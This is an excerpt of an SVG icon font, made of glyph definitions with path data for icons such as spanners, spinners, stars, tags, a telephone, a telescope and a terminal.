<glyph glyph-name="space" horiz-adv-x="1000" unicode="&#xeff0;" d="M257 453c-3-6-3-10 2-15 18-17 35-35 54-51 62-52 131-95 203-132 59-31 119-57 184-72 6-1 10 0 14 5 48 66 65 139 48 218-27 121-133 208-263 209-11-1-25-1-39-3-95-18-163-71-203-159z m657-272c-21 34-49 63-79 91-16 15-32 29-49 43-3 3-5 2-6-1-4-19-7-36-12-54-1-5 0-9 3-14 8-13 16-27 21-42 5-17-4-30-22-35-10-3-21-4-31-3-23 3-46 6-69 12-73 20-141 53-206 90-77 44-149 92-211 156-18 20-35 40-44 66-7 22 1 36 24 41 12 3 26 1 39 2 5 0 11 0 14 3 14 12 28 25 42 38 2 2 3 4 3 4-1 1-1 1-2 1-43 13-86 27-130 38-31 8-62 11-94 5-35-7-50-30-39-64 6-16 14-32 24-46 40-57 92-102 146-145 97-76 202-140 312-193 80-39 163-73 250-91 32-7 65-11 97-5 36 6 50 30 39 64-5 14-12 27-20 39z m-282-65c3 2 3 4 0 5-141 60-270 134-391 226-3 1-5 0-5-3 0-86 49-184 144-231 84-43 167-40 252 3z" />
<glyph glyph-name="spanner" horiz-adv-x="1000" unicode="&#xeff1;" d="M739 723c-5 6-13 9-21 9-8-1-15-6-18-14l-43-98-53-13-34 52 42 97c4 7 3 16-2 22s-13 10-21 9c-60-6-113-44-137-100-18-41-19-86-2-128 6-15 14-30 24-42l-29-67 0-1c-33-9-62-32-76-64l-133-307c-12-27-12-58-1-86 11-28 32-50 60-62l19-8c15-6 30-10 45-10 45 0 86 27 103 68l133 307c15 33 11 70-5 99l0 1 29 67c62 5 116 43 140 100 25 56 17 121-20 169z m-354-687c-7-15-24-22-39-15-16 6-23 24-16 39 7 15 24 22 39 16 16-7 23-25 16-40z" />
<glyph glyph-name="speech-comments" horiz-adv-x="1000" unicode="&#xeff2;" d="M775 214c63 75 86 161 63 257-21 86-75 149-148 195-89 55-186 74-289 61-100-12-187-52-255-128-66-76-92-163-68-262 10-40 23-78 26-119 3-51-4-99-29-145-4-7-8-13-12-20 1-1 2-1 3-1 66 9 128 28 184 64 5 4 9 6 16 2 87-40 178-52 272-35 94 17 175 58 237 131z m158-232c-5 7-11 14-15 21-26 50-23 101-6 151 18 54 16 106-8 157-7 14-16 27-25 43-2-6-3-9-3-12-9-43-25-83-50-118-70-103-171-158-291-178-22-4-43-5-65-7 0-1 1-2 2-3 5-4 10-7 16-10 93-50 187-54 284-14 4 1 10 2 14 0 31-19 65-32 100-39 14-2 28-4 42-4 11 0 12 4 5 13z" />
<glyph glyph-name="speed-meter" horiz-adv-x="1000" unicode="&#xeff3;" d="M63 305c4 75 25 144 64 207 86 135 210 204 352 212 7 0 14 0 21 0 7 0 14 0 21 0 142-8 266-77 352-212 40-63 60-132 64-207 6-120-31-226-110-318-13-16-23-16-37-1-15 14-29 29-44 43-16 16-17 24-2 41 31 37 54 79 65 127 31 131-4 243-104 333-53 48-117 73-189 76-6 1-11 1-16 1s-10 0-15-1c-72-3-137-28-190-76-100-90-135-202-104-333 11-48 34-90 66-127 14-17 13-25-3-41-14-14-29-29-43-43-15-15-25-15-38 1-79 92-116 198-110 318z m406 12c27 20 54 40 81 60 42 32 85 64 127 95 4 3 10 6 15 6 13-1 16-14 7-26-52-70-105-139-157-209-14-18-36-26-59-18-21 7-35 27-35 49 0 18 7 32 21 43z" />
<glyph glyph-name="spinner-alt-1" horiz-adv-x="1000" unicode="&#xeff4;" d="M280 368c-7 44-43 81-86 89-45 9-92-11-115-49-8-14-13-29-16-44v-28c1-1 1-4 1-6 9-55 66-97 121-89 64 10 104 64 95 127z m441-41c10-46 51-83 98-86 50-4 94 24 111 70 4 8 5 17 8 25v28c-1 1-2 2-2 4-11 62-68 101-130 89-59-11-97-70-85-130z m-98-210c0-57 45-107 107-108 62-1 111 48 112 109 0 60-49 109-110 110-61 0-109-49-109-111z m-14-95c0 60-48 109-109 109-61 1-109-48-110-110 0-58 46-107 107-109 63-1 112 48 112 110z m-112 547c63-1 112 48 112 109 1 60-48 109-109 110-61 0-109-49-109-111-1-57 45-107 106-108z m-120 13c0 61-49 110-109 110-61 0-110-50-109-112 1-62 51-107 108-107 62 0 110 48 110 109z m246 0c1-62 49-110 112-109 59 1 107 50 107 109-1 63-51 111-114 110-61-2-106-53-105-110z m-245-464c-1 61-50 110-111 110-60-1-109-50-109-110 1-60 50-110 111-109 60 0 109 49 109 109z" />
<glyph glyph-name="spinner-alt-2" horiz-adv-x="1000" unicode="&#xeff5;" d="M906 381c-52 0-104 0-157-1-19 0-31-12-31-31 1-19 13-31 32-31 52 0 104 0 157 0 12 0 20 6 26 15 2 2 1 5 4 7v17c-5 14-14 23-31 24z m-375-359c0 25 0 51 0 77 0 19-12 31-31 32-18 0-31-12-31-31 0-52 0-105 0-157 0-18 13-31 31-31 18 0 31 13 31 32v78z m87 513c14-4 27 1 35 14 27 45 54 90 80 135 9 15 5 33-10 42-16 10-34 6-43-9-27-45-54-90-80-135-3-5-5-11-5-16 0-15 10-28 23-31z m-117 253c-18 0-32-12-32-31 0-52 0-104 0-156 0-6 1-12 4-17 7-12 22-18 36-15 14 4 23 15 23 31 0 52 0 104 0 157 0 17-13 30-31 31z m182-318c5-14 16-23 31-23 6 0 12 3 17 6l87 52c15 10 31 19 47 29 15 10 18 27 9 42-9 15-26 20-40 12-47-28-93-56-139-84-12-7-16-21-12-34z m184-295c-19 12-39 23-59 34-26 15-52 30-78 44-15 9-32 3-41-13-8-15-4-32 11-41 45-26 91-52 137-78 21-12 46 2 47 29-1 10-6 19-17 25z m-217-26c-9 15-26 20-41 11-16-9-21-26-12-42 26-46 52-92 78-137 8-13 21-18 35-14 14 4 23 17 23 31 0 5-2 10-4 14-27 46-53 92-79 137z m-368 199c0 20-11 32-31 32-52 0-104 0-157 0-16 0-25-9-31-23v-18c3-1 3-4 4-6 6-10 15-16 27-16 52 0 104 0 157 0 19 1 31 13 31 31z m65 201c8-13 21-18 35-14 14 3 24 16 24 31 0 5-2 10-5 16-27 45-53 90-80 135-10 15-27 19-43 9-15-9-20-27-11-42 27-45 54-90 80-135z m-212-15c16-10 32-19 48-29 28-17 57-34 86-52 6-3 11-6 18-6 14 0 26 9 30 23 4 13 0 27-12 34-46 28-92 56-138 83-15 9-32 4-41-11-9-15-5-32 9-42z m176-294c-8 16-25 22-41 13-26-14-51-29-77-43-20-12-40-23-60-35-11-6-16-15-16-24 1-27 25-42 46-30 46 26 92 52 138 79 14 8 19 25 10 40z m81-80c-16 9-33 4-42-11-26-45-52-91-78-137-3-4-5-9-5-14 0-14 10-26 23-31 14-4 28 1 35 14 26 46 53 92 79 138 9 15 4 32-12 41z" />
<glyph glyph-name="spinner-alt-3" horiz-adv-x="1000" unicode="&#xeff6;" d="M509 766c-5 0-9-4-9-9 0-29 0-56 0-83 0-5 4-10 10-10 174-9 286-136 313-256 26-116-2-218-81-308-4-4-10-4-14 0-26 26-51 50-75 74-4 4-7 3-7-3 0-77 1-154 1-227 0-6 4-10 10-10 75 0 152 0 229 1 6 0 7 3 3 6-23 24-48 48-71 72-4 3-4 10-1 14 138 170 163 352 46 541-80 129-204 191-354 198z m-254-166c4 4 10 4 14 0l75-75c4-3 7-2 7 3 0 78 0 155 0 227 0 5-5 9-10 9-76 0-153 0-229 0-5 0-7-3-3-7 23-23 47-47 72-71 3-4 4-10 0-14-158-171-141-399-49-540 86-130 238-201 356-196 6 0 10 5 10 11 0 26 0 52 1 78 0 6-5 11-10 11-149 14-256 85-306 229-42 124-13 235 72 335z" />
<glyph glyph-name="spinner-alt-4" horiz-adv-x="1000" unicode="&#xeff7;" d="M183 616c-11 11-30 9-41-6-40-55-68-120-79-190-3-19 9-34 25-34s31 15 34 34c10 54 31 104 61 148 11 15 12 36 0 48z m99 51c44 30 94 51 148 61 19 3 34 18 34 34s-15 28-34 25c-70-11-135-39-190-79-15-11-17-30-5-41 11-12 32-11 47 0z m-219-387c11-70 39-135 79-190 11-15 30-17 41-5 12 11 11 32 1 47-31 44-52 94-62 148-3 19-17 34-34 34s-28-15-25-34z m507 448c54-10 104-31 148-61 15-11 36-11 48 0 11 11 9 31-6 41-55 40-120 68-190 79-19 3-34-9-34-25s15-31 34-34z m-330-736c55-40 120-68 190-79 19-3 34 9 34 25s-15 31-34 34c-54 10-104 31-148 61-15 11-36 11-48 0s-9-30 6-41z m697 428c-11 70-39 135-79 190-10 15-30 17-41 6-11-12-11-33 0-48 30-44 51-94 61-148 3-19 18-34 34-34s28 15 25 34z m-120-335c11-12 31-10 41 5 40 55 68 120 79 190 3 19-9 34-25 34s-31-15-34-33c-10-55-31-105-61-149-11-15-12-36 0-47z m-281-147c0-16 15-28 34-25 70 11 135 39 190 79 15 11 17 30 6 41s-33 11-48 1c-44-30-94-52-148-62-19-3-34-18-34-34z" />
<glyph glyph-name="spinner-alt-5" horiz-adv-x="1000" unicode="&#xeff8;" d="M882 83c30-1 54-25 55-56 2-29-21-55-51-57-23-1-46-1-69-1-48 1-95 0-143 2-28 0-50 25-50 53-1 69-1 137 0 205 0 31 26 55 57 55 30-1 55-25 55-56l0-72c0-2 0-5 1-9 34 42 57 87 67 138 7 33 35 52 67 46 30-6 49-36 43-67-8-40-22-78-41-113-13-23-28-45-42-68 17 0 34 0 51 0z m-32 309c-13 0-31 5-39 22-13 27-25 56-31 85-6 25 15 50 39 56 27 8 55-3 66-28 10-23 19-47 24-71 8-32-20-64-59-64z m-92 197c-22-11-44-7-64 7-12 10-25 19-38 28-27 17-35 51-20 77 16 26 50 35 77 19 19-12 38-26 56-40 12-10 18-25 19-43-1-20-10-38-30-48z m-236 79h-22v0c-9 0-18 0-27 0-28 1-52 24-55 53-2 26 17 54 45 57 21 3 43 2 65 0 29-2 51-29 49-56-2-31-25-54-55-54z m-319-183c-16-21-46-25-68-12-23 13-37 40-27 64 8 20 19 39 33 55 14 18 40 22 60 13 22-11 33-28 34-54-1-4 0-10-3-14-9-18-17-36-29-52z m94 125c-2-1-5 0-7 0-24 0-44 14-52 36-8 23-1 49 18 63 13 9 28 18 43 25 22 10 49 3 64-14 17-19 20-47 6-66-18-24-44-37-72-44z m-126-217c7-17 6-35 3-53-3-21-15-36-35-44-21-8-40-4-56 10-17 14-22 32-20 51 0 7 0 11 0 15 1 27 19 48 46 54 24 4 51-10 62-33z m133-308c31 0 60-27 60-58 1-32-24-58-55-58-32-1-61 27-61 58-1 30 25 57 56 58z m-136 136c31 0 58-28 58-60 0-31-25-56-55-56-32 0-60 29-60 62 1 31 25 55 57 54z m323-188c32 0 58-25 58-57-1-32-25-54-58-56-26-1-56 19-57 56-1 31 25 57 57 57z" />
<glyph glyph-name="spinner-alt-6" horiz-adv-x="1000" unicode="&#xeff9;" d="M746 107c-26-25-27-62-3-87 25-25 61-25 87 0 26 24 27 63 3 87-24 25-62 25-87 0z m-650 444c-13-13-13-31-1-43 11-12 31-12 43 0 12 12 12 33 0 45-13 11-30 11-42-2z m199 201c-12-11-12-30-1-42 11-11 32-12 44 0 12 10 12 32 1 44-12 11-31 11-44-2z m-61-716c-12-12-11-31 1-42 12-12 32-12 43 0 12 12 12 30 0 42-13 13-31 14-44 0z m577 581c-12-12-12-31 1-43 11-12 31-12 42 0 12 11 12 32 0 44-12 11-31 11-43-1z m-739-348c-12-12-12-31 0-43 12-12 30-12 42-1 12 12 12 32 1 44-12 11-31 11-43 0z m856 75c-12 12-31 11-43-2-12-12-11-30 1-42 12-11 31-11 42 0 12 12 12 33 0 44z m-420-381c-11-12-11-30 1-42 12-12 32-11 43 1 12 11 11 31 0 42-13 12-31 12-44-1z m69 815c-11-12-11-30 1-42 11-12 32-12 43 0 12 12 11 32-2 43-12 12-30 11-42-1z" />
<glyph glyph-name="spinner" horiz-adv-x="1000" unicode="&#xeffa;" d="M797 164c-48 33-115 20-149-27-29-41-26-99 6-133 40-42 93-51 140-22 5 4 10 7 16 11 2 3 5 6 8 9 1 5 6 8 8 12 34 48 20 116-29 150z m-571 491c-16 0-30-7-44-15-4-4-8-8-12-12-1-2-1-3-2-5-19-27-16-64 5-88 24-25 60-32 89-15 29 16 44 49 35 81-8 33-37 54-71 54z m683-258c-39 40-102 41-141 2-39-39-39-102 0-141 39-38 101-38 140 0 39 39 40 101 1 139z m-109 122c35 35 35 92 0 127-34 35-91 36-126 2-36-36-37-92-2-128 36-36 93-36 128-1z m-376 223c-31-32-31-83 1-115 32-32 83-31 115 1 31 32 31 82-1 114-32 32-83 32-115 0z m-254-369c-24 25-64 25-89 0-25-25-25-64 0-89 25-25 65-25 89 0 25 24 25 65 0 89z m18-258c-22-22-22-57 0-78 22-22 57-22 78 0 22 21 22 57 0 78-21 22-57 22-78 0z m246-105c-17-18-17-45 0-63 18-18 46-18 64-1 18 18 18 48 0 65-18 17-46 17-64-1z" />
<glyph glyph-name="spreadsheet" horiz-adv-x="1000" unicode="&#xeffb;" d="M63 749v-798h875v798h-875z m312-32h250v-159h-250v159z m0-191h250v-160h-250v160z m-32-543h-249v159h249v-159z m0 191h-249v160h249v-160z m0 193h-249v159h249v-159z m0 191h-249v159h249v-159z m563-575h-62v224h-94v-224h-63v159h-94v-159h-62v96h-94v-96h-62v351h531l0-351z m0 384h-250v159h250v-159z m0 191h-250v159h250v-159z" />
<glyph glyph-name="square" horiz-adv-x="1000" unicode="&#xeffc;" d="M865 788h-730c-40 0-72-33-72-73v-730c0-40 32-73 72-73h730c40 0 73 33 73 73v730c0 40-33 73-73 73z" />
<glyph glyph-name="ssl-security" horiz-adv-x="1000" unicode="&#xeffd;" d="M822 173v230h-57v119c0 147-119 266-265 266s-265-119-265-266v-120h-57v-257c14 15 29 30 44 45h59l-103-104v-60c55 54 110 109 164 164h60c-6-6-11-11-17-17-64-64-128-128-192-193h-15v-67h644v81l-14-14h-59c0 1 1 2 1 3 11 10 21 20 32 31l40 40v60l-74-74-59-60h-60l149 149c15 15 29 29 44 44z m-487 229v120c0 91 74 165 165 165 91 0 165-74 165-165v-120h-330z m-22-422h-59c49 50 99 100 149 149l61 61h59l-150-150-60-60z m60 0c1 1 1 2 2 2l31 32 176 176h60c-6-6-11-11-17-17-64-64-128-128-192-193l-60 0z m388 193c-64-64-128-128-192-193h-60c0 1 1 2 2 2 10 11 20 21 31 32l176 176h60c-6-6-12-11-17-17z" />
<glyph glyph-name="star-alt-1" horiz-adv-x="1000" unicode="&#xeffe;" d="M936 363c2 0 2 0 0 0-113 7-225 15-339 44-2 0-2 1-1 3 34 53 66 104 99 156 1 2 1 2 0 1-44-45-87-88-137-125-1-1-3-1-3 1-32 113-42 228-51 342 0 2 0 2 0 0-8-113-19-226-48-337-1-2-2-2-4-1-50 36-93 79-137 121-1 1-1 1 0 0 36-50 71-99 101-154 1-2 1-3-1-4-116-31-233-41-351-49-2 0-2 0 0 0 118-10 236-20 355-55 1 0 2-2 1-3-39-48-76-94-113-140-1-1 0-1 1 0 44 37 88 74 138 106 1 0 3 0 3-2 36-116 49-234 59-352 0-2 0-2 1 0 6 119 14 238 45 356 0 2 2 2 3 1 28-17 55-33 81-50 26-16 51-34 76-52 1-1 1-1 0 1-42 42-84 85-122 135-1 2-1 3 1 3 40 9 77 19 114 26 39 7 78 12 117 17 37 5 75 7 112 11z" />
<glyph glyph-name="star-alt-2" horiz-adv-x="1000" unicode="&#xefff;" d="M926 375h-355c-6 0-8 3-3 8l251 251c4 4 4 11 0 16l-19 19c-5 4-12 4-16 0l-251-251c-5-5-8-3-8 3v355c0 7-5 12-11 12h-28c-6 0-11-5-11-12v-355c0-6-3-8-8-3l-251 251c-4 4-11 4-16 0l-19-19c-4-5-4-12 0-16l251-251c5-5 3-8-3-8h-355c-6 0-11-5-11-11v-28c0-6 4-11 11-11h355c6 0 8-3 3-8l-251-251c-4-4-4-11 0-16l19-19c5-4 12-4 16 0l251 251c5 5 8 3 8-3v-355c0-7 5-12 11-12h28c6 0 11 5 11 12v355c0 6 3 8 8 3l251-251c4-4 11-4 16 0l19 19c4 5 4 12 0 16l-251 251c-5 5-3 8 3 8h355c7 0 12 5 12 11v28c0 6-5 11-12 11z" />
<glyph glyph-name="star" horiz-adv-x="1000" unicode="&#xf000;" d="M935 444c-16-17-33-34-50-51-45-44-91-89-137-133-7-7-14-14-21-22-3-3-4-8-4-12 17-99 34-197 51-296 0-1 0-1 0-2-1-1-5 1-10 4-18 9-35 18-52 27-69 36-138 73-207 109-6 3-10 2-15-1-86-45-172-91-259-136-1-1-3-2-4-2-3-1-4 2-3 8 4 23 7 46 11 69 13 74 26 148 38 222 1 3-1 8-4 11-45 44-90 87-134 132-25 24-48 49-70 74-4 4-3 8 3 9 12 2 26 4 40 6 60 9 121 17 181 26 20 3 41 7 61 9 8 1 11 4 15 11 42 86 84 172 127 258 1 2 2 3 3 5 1 3 4 4 6 1 1-1 2-3 2-4 43-87 86-174 129-261 3-6 7-9 14-10 89-13 177-26 266-39 7-1 13-2 20-3 6 0 7-4 3-9z" />
<glyph glyph-name="street-view" horiz-adv-x="1000" unicode="&#xf001;" d="M760 130c-42 43-97 60-153 73-7 1-16-7-17-14 0-8 8-5 12-8 0 0 1 0 2 0 34-9 67-22 95-45 45-37 46-87 2-124-16-13-34-25-53-32-49-19-98-28-148-28-50 0-99 9-148 28-19 8-37 19-53 33-45 36-43 86 2 123 28 23 61 36 95 45 1 0 2 0 2 1 4 2 12-1 12 8-1 6-10 15-17 13-56-12-111-30-153-73-43-43-41-96 3-138 34-31 74-48 116-61 50-14 101-19 135-18 2 0 4 0 6 0l5 0c35-1 86 4 135 18 43 13 83 30 117 61 44 41 46 95 3 138z m-405 282c1-18 13-31 29-31 18-1 31 12 31 31 0 48 0 95 1 143 0 4 2 8 4 12 1-4 3-8 3-12 1-130 1-260 1-390-2 0-3 0-5 0-25-9-48-20-64-43-11-16-10-37 2-53 14-19 33-30 54-37 29-11 59-16 89-16h1c29 0 59 5 89 16 21 7 40 18 54 37 11 16 12 37 2 53-16 23-39 34-64 43-1 0-3 0-4 0v168c0 74 0 147 0 221 0 4 3 8 4 13 1-5 4-9 4-13 0-46 0-92 0-138 0-11 3-21 12-28 10-7 20-9 31-3 13 6 17 17 17 30 1 54 1 107 0 160-1 48-34 80-82 80-43 0-86 0-129 0-46-1-79-34-79-80 0-22 0-45 0-68-1-32-1-63-1-95z m92-334c24-8 47 8 47 34l0 222c0 5-2 14 6 14 9 0 7-9 7-14 0-73 0-146 0-218 0-8 2-17 6-24 7-14 24-19 41-14 15 4 24 17 24 33v31c4-2 9-4 13-6 13-8 25-17 25-34s-12-26-25-33c-26-15-55-19-82-19-3 0-6 0-9 0h0l-9 0c-27 0-56 4-82 19-13 7-25 16-25 33s12 26 25 34c5 2 10 5 15 7v-25c0-3 0-7 0-10 0-14 9-26 23-30z m53 585c35 0 62 27 62 62 1 35-27 63-61 63-35 0-64-29-63-63 0-34 28-62 62-62z" />
<glyph glyph-name="support-faq" horiz-adv-x="1000" unicode="&#xf002;" d="M807 674c-82 67-191 103-307 103s-225-36-307-103c-84-68-130-159-130-256 0-93 42-180 119-247l158-235c6-9 15-13 25-13h0c11 0 20 5 25 14l75 123c11-1 23-1 35-1 116 0 225 36 307 103 84 68 131 159 131 256 0 97-47 188-131 256z m-317-374c0-2-1-3-3-3h-242c-2 0-3 1-3 3v35c0 2 1 3 3 3h242c2 0 3-1 3-3v-35z m0 80c0-2-1-3-3-3h-242c-2 0-3 1-3 3v36c0 1 1 3 3 3h242c2 0 3-2 3-3v-36z m0 81c0-2-1-3-3-3h-242c-2 0-3 1-3 3v35c0 2 1 3 3 3h242c2 0 3-1 3-3v-35z m196-215c-13-2-24-3-36-3-12 0-24 1-35 3-2 12-3 24-3 35 0 12 1 24 3 36 11 2 23 3 35 3 11 0 23-1 36-3 1-12 2-24 2-35 0-12-1-24-2-36z m64 210c-6-11-13-21-21-28-8-8-17-14-26-19-8-4-15-8-21-10v-44c-11-2-22-3-32-3-11 0-21 1-31 3v83c8 1 15 3 23 6 8 2 16 5 23 10 6 4 12 9 16 15 5 7 7 14 7 24 0 14-5 24-15 31s-23 11-40 11c-7 0-13 0-18 0-5-1-10-2-15-3-4-1-9-2-13-4-5-1-10-3-15-5-5 9-8 17-11 26-3 9-5 19-6 28 9 3 17 6 24 8 7 2 14 4 20 5 7 1 14 2 21 3 6 0 14 0 21 0 39 0 68-8 88-26 19-18 29-42 29-72 1-15-2-28-8-39z" />
<glyph glyph-name="tack-pin" horiz-adv-x="1000" unicode="&#xf003;" d="M813 356c-3 5-6 9-9 13-46 66-108 102-189 102-7 0-11 1-15 8-32 58-65 117-98 175-4 7-3 12 0 19 8 16 16 33 21 51 5 18 6 36 1 54-3 9-14 12-22 7-103-57-205-114-310-173-9-5-10-14-3-20 6-6 11-11 17-15 25-17 53-22 83-23 9 0 13-4 18-12 31-57 63-114 96-171 4-8 4-13-1-21-45-75-42-149-6-225 4-9 15-12 23-7 47 26 94 53 141 79 8 4 19 2 25-6 66-89 131-177 197-265 6-8 11-14 11-14 1 1-2 8-5 17-41 102-82 204-124 307-3 9 0 20 9 25 44 24 88 49 133 74 8 5 11 14 7 21z" />
<glyph glyph-name="tag" horiz-adv-x="1000" unicode="&#xf004;" d="M537-62c-150 150-300 300-450 451-2 2-5 4-7 6-6 12-15 24-17 36-2 15 1 30 5 45 15 70 31 140 47 210 5 25 19 44 45 49 74 17 148 33 222 50 31 7 57 0 79-23 26-28 54-54 81-82l370-370c33-32 34-73 2-105-90-90-181-181-271-271-14-14-30-21-46-21-26-1-44 9-60 25z m-216 663c0 40-33 72-73 72-40 0-72-32-73-72 0-40 33-73 74-73 40 1 73 34 72 73z" />
<glyph glyph-name="tags" horiz-adv-x="1000" unicode="&#xf005;" d="M815 315c-109 109-218 219-328 328-24 24-48 48-72 72-6 7-13 12-20 15-15 8-31 9-49 5-66-15-131-29-197-44-24-5-35-21-40-43-14-62-28-124-42-187-3-12-6-26-4-39 2-11 10-21 15-32 2-2 4-4 6-6 133-133 266-266 399-399 14-14 30-23 53-22 11 0 22 4 32 11 3 2 6 5 8 8 80 80 161 160 240 240 29 28 28 64-1 93z m-552 204c-10-7-22-11-35-11-35 0-64 27-65 61-1 1-1 2-1 3 1 11 3 21 8 30 11 21 32 34 57 34 13 0 26-4 36-10 17-12 29-31 29-54 0-22-12-41-29-53z m653-204c-110 109-219 219-328 328-24 24-49 48-72 72-20 20-43 26-70 20-7-1-15-3-22-5 7-3 13-8 20-15 23-24 48-48 72-72 109-109 219-219 328-328 29-29 29-65 1-93-80-80-160-160-240-240-3-3-6-6-9-8 11-7 24-12 40-11 15 0 29 7 41 19 80 80 160 160 240 240 28 28 27 64-1 93z" />
<glyph glyph-name="tasks-alt" horiz-adv-x="1000" unicode="&#xf006;" d="M280 637h25c19 0 34 19 34 41v68c0 23-15 41-34 41h-25c-19 0-35-18-35-41v-68c0-22 16-41 35-41z m401 0h25c19 0 35 19 35 41v68c0 23-16 41-35 41h-25c-19 0-34-18-34-41v-68c0-22 15-41 34-41z m136 75h-35v-34c0-45-34-82-76-82h-25c-41 0-75 37-75 82v34h-226v-34c0-45-34-82-75-82h-25c-42 0-76 37-76 82v34h-21c-59 0-106-47-106-105v-589c0-58 47-106 106-106h634c59 0 106 48 106 106v589c0 58-48 105-106 105z m56-685c0-29-24-53-53-53h-640c-29 0-53 24-53 53v480h746l0-480z m-619 298h492c15 0 27 19 27 43 0 24-12 44-27 44h-492c-15 0-28-20-28-44 0-24 13-43 28-43z m0-137h492c15 0 27 19 27 43s-12 44-27 44h-492c-15 0-28-20-28-44s13-43 28-43z m0-137h297c15 0 28 20 28 44 0 24-13 43-28 43h-297c-15 0-28-19-28-43 0-24 13-44 28-44z" />
<glyph glyph-name="tasks" horiz-adv-x="1000" unicode="&#xf007;" d="M756 680h-96v12c0 14-11 25-25 25h-66v45c0 14-11 26-25 26h-88c-14 0-25-12-25-26v-45h-66c-14 0-25-11-25-25v-12h-96c-20 0-36-16-36-36v-696c0-19 16-36 36-36h512c19 0 35 17 35 36v696c0 20-16 36-35 36z m-289 80h66c1 0 2-1 2-3v-34h-71v34h0c0 2 1 3 3 3z m278-795c0-2-2-5-5-5h-481c-2 0-5 3-5 5v657c0 3 3 5 5 5h84v-38c0-14 11-25 24-25h265c14 0 25 11 25 25v38h83c3 0 6-2 6-5v-657z m-295 377c-47-29-80-65-94-81l-35 28c-1 0-20-17-20-17l64-65c0-1 1-1 2-1 0 0 0 0 0 0 1 0 2 1 2 1 10 27 44 82 88 122 1 1 1 2 0 3 1 0-6 10-7 10z m243-52h-190c-3 0-6-2-6-5v-22c0-3 3-6 6-6h190c3 0 6 3 6 6v22c0 3-3 5-6 5z m-243 206c-47-29-81-65-94-81l-35 27c-1 1-21-16-20-17l64-65c0 0 1 0 2 0 0 0 0 0 0 0 1 0 2 0 2 1 10 27 44 82 88 122 1 0 1 1 0 3 0-1-6 10-7 10z m243-52h-190c-3 0-6-2-6-5v-22c0-4 3-6 6-6h190c3 0 6 2 6 6v22c0 3-3 5-6 5z m-243-256c-47-29-81-65-94-81l-35 28c-1 0-21-17-20-17l64-65c0-1 1-1 2-1 0 0 0 0 0 0 1 0 2 1 2 2 10 26 44 81 88 121 1 1 1 2 0 3 0 0-6 10-7 10z m243-51h-190c-3 0-6-3-6-6v-22c0-3 3-6 6-6h190c3 0 6 3 6 6v22c0 3-3 6-6 6z" />
<glyph glyph-name="telephone" horiz-adv-x="1000" unicode="&#xf008;" d="M857 290c-112 33-203 93-203 207 0 18-11 32-28 32s-30-13-30-29-15-28-33-28h-127c-18 0-33 13-33 28s-13 29-30 29-26-14-26-32c3-57-16-170-199-209-18-4-33-7-35-7-1-1-2-16-2-34v-192c0-18 15-33 33-33h712c18 0 33 15 33 33v224s0 1 0 2c0 0-14 4-32 9z m-310 29l36 37c5 6 14 6 20 0s6-15 0-21l-36-38c-5-6-14-6-20 0-5 6-5 16 0 22z m-62 68c0 8 6 15 14 15 0 0 0 0 0 0 1 0 1 0 1 0 8 0 14-7 14-15v-54c0-8-6-15-14-15 0 0 0 0-1 0 0 0 0 0 0 0-8 0-14 7-14 15v54z m-132-140c0 8 6 15 14 15h51c7 0 14-7 14-15 0-9-7-16-14-16h-51c-8 0-14 7-14 16z m99-73l-36-37c-6-6-14-6-20 0s-6 15 0 21l35 38c6 6 15 6 21 0 5-6 5-16 0-22z m0 123c-6-6-15-6-21 0l-35 38c-6 6-6 15 0 21s14 6 20 0l36-37c5-6 5-16 0-22z m62-191c0-8-6-15-14-15 0 0 0 0-1 0 0 0 0 0 0 0-8 0-14 7-14 15v54c0 8 6 15 14 15 0 0 0 0 0 0 1 0 1 0 1 0 8 0 14-7 14-15v-54z m-14 105h-1c-19 0-34 16-34 36 0 19 15 35 34 35h1c19 0 33-16 33-35 1-20-14-36-33-36z m103-74c-6-6-15-6-20 0l-36 37c-5 6-5 16 0 22s15 6 20 0l36-38c5-6 5-15 0-21z m29 94h-51c-7 0-14 7-14 16 0 8 6 15 14 15h51c7 0 14-7 14-15 0-9-7-16-14-16z m-210 328c51 4 114 5 176 0 44-4 95-3 95-32h243c-5 33-73 147-425 151-371 3-449-118-448-151h242c0 27 40 26 117 32z m-141-133c15 0 24 13 24 25v50h-242s0-53 0-53c0-13 9-22 27-22h-3 194z m657 75h-243v-50c0-12 9-25 24-25h194-3c18 0 27 9 27 22 0 0 1 53 1 53z" />
<glyph glyph-name="telescope" horiz-adv-x="1000" unicode="&#xf009;" d="M935 503c-34 81-68 162-103 243-6 13-21 20-34 14-82-35-162-69-244-103-13-6-19-21-13-34l14-34-20-18-6 15c-6 14-22 20-36 14-65-27-130-55-196-83-14-6-20-22-14-36 4-10 9-21 13-32h-28c-7 9-19 12-29 8-46-20-91-39-137-59-13-5-20-20-14-34 4-9 8-19 12-28-10-5-20-9-30-13-6-3-9-10-7-16 10-22 19-43 28-65 2-6 10-9 16-6l30 13c3-7 6-15 9-22 6-13 21-19 34-13 46 19 92 38 137 58 14 5 20 21 14 34l-3 7h26c4-9 8-18 12-28 3-8 10-13 18-15 0-1 0-1 0-2 5-11 10-22 14-33 2-5 7-7 12-5 10 4 20 8 31 13 5 2 7 0 5-5-39-98-77-194-115-292-2-4 0-8 5-8 8 0 15 0 22 0 7-1 10 2 13 9 43 103 87 206 130 310 3 9 8 15 16 18 4 2 9 1 11-2 1-2 1-3 2-5 15-33 30-67 46-100 33-73 66-146 99-219 2-3 6-8 9-8 8-1 17-1 26-1 5 0 7 4 5 8-49 114-98 227-146 340-2 4 0 9 4 11 17 7 34 15 51 22 5 2 7 7 5 11-5 11-10 22-14 34-1 1-2 1-3 2 3 7 4 15 1 22l-1 2 19 18 13-31c6-13 21-19 34-13 81 34 162 68 244 103 13 5 19 21 13 34z" />
<glyph glyph-name="terminal" horiz-adv-x="1000" unicode="&#xf00a;" d="M195 329c0-5 0-11 0-17 0-8 1-19 2-32l169 83c3 12 4 24 4 36 0 13-1 26-4 40l-169 84c-1-7-1-14-2-20 0-6 0-11 0-16 0-6 0-11 0-17 1-6 1-11 2-16l123-53-123-55c-1-5-2-11-2-17z m213-152h200c1 5 1 9 2 13 0 4 0 8 0 11 0 5 0 9 0 13-1 4-1 9-2 13h-200c-1-4-1-9-2-12 0-4 0-8 0-12 0-4 0-8 0-12 1-5 1-9 2-14z m-345 427v-508c0-43 34-78 77-78h720c43 0 78 35 78 78v508c0 43-35 78-78 78h-720c-43 0-77-35-77-78z m766-553h-654c-42 0-77 34-77 77v444c0 42 35 77 77 77h654c42 0 77-35 77-77v-444c0-43-35-77-77-77z" />
